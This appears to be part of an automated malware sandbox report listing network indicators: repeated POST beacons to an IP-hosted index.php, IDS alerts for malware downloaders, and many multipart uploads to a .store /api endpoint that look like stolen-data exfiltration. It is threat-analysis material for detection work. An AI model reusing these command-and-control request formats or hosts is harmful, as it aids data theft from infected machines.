Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49738 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49820 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49878 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49911 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49910 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49920 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49932 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49946 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49945 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49957 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49978 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49975 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49975 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49989 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50035 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50002 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50026 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50049 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50072 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50073 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50058 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50075 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50076 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49990 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50056 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50116 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50113 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50118 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50115 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50127 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50125 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50119 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50122 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50126 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50130 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50129 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50131 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50133 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50134 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50147 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50141 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50158 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50186 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50187 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50191 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50189 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50195 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50197 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50198 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50194 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49739
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18168Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8789Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20442Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1261Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571385Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18168Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8789Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20442Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1295Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18168Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8789Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20442Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1289Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48472Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 29026Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18168Host: necklacedmny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8789Host: necklacedmny.store
